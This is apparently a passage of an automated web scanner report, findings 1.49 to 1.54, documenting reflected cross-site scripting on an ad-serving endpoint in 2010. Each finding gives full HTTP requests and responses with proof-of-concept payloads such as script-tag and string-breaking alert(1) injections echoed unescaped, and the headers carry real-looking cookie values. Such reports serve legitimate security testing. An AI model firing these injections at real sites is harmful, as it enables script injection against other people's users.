GET /8GF/iview/273499083/direct4c209'%3bd57c61ac63f/01/4055590?click=http://vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10027
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:41 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct4c209';d57c61ac63f;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct4c209';d57c61ac63f;ai.180920921;ct.1/01" />
...[SNIP]...

1.49. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2656d</script><script>alert(1)</script>23fe364328 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f2656d</script><script>alert(1)</script>23fe364328 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10109
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:36 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f2656d</script><script>alert(1)</script>23fe364328",
clickThruUrl: "http://clk.redcated/go/273499083/direct;ai.180920921;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

1.50. http://redcated/8GF/iview/273499083/direct/01/4055590 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed69'-alert(1)-'620381f48c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f8ed69'-alert(1)-'620381f48c5 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10018
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:36 GMT

<html><head><title>BW_728x90_PR_TradeshowBanner</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f8ed69'-alert(1)-'620381f48c5');
}
else
{
_strContentBUW1288825341643 = '<a target="_blank" href="http://clk.atdmt.com/go/273499083/direct;ai.189412363;ct.1/01/" onclick="if(\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3
...[SNIP]...

1.51. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a13fa'-alert(1)-'d10f1ed129e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&a13fa'-alert(1)-'d10f1ed129e=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10016
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:38 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&a13fa'-alert(1)-'d10f1ed129e=1');
}
else
{
_strContentBUW1283366279356 = '<a target="_blank" href="http://clk.atdmt.com/go/273499083/direct;ai.180920921;ct.1/01/" onclick="if(\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e
...[SNIP]...

1.52. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97117"><script>alert(1)</script>624b718fa81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&97117"><script>alert(1)</script>624b718fa81=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10095
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:37 GMT

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&97117"><script>alert(1)</script>624b718fa81=1\')(new Image).src=\'http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cb
...[SNIP]...

1.53. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdfe"-alert(1)-"bc4ea792af0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&3fdfe"-alert(1)-"bc4ea792af0=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10048
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 26 Nov 2010 20:21:37 GMT

<html><head><title>BW_728x90_PR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&3fdfe"-alert(1)-"bc4ea792af0=1",
clickThruUrl: "http://clk.redcated/go/273499083/direct;ai.180923822;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

1.54. http://redcated/8GF/iview/273499083/direct/01/4347559 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4347559

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc601'%3ba4b4776bc56 was submitted in the REST URL parameter 4. This input was echoed as dc601';a4b4776bc56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/directdc601'%3ba4b4776bc56/01/4347559 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
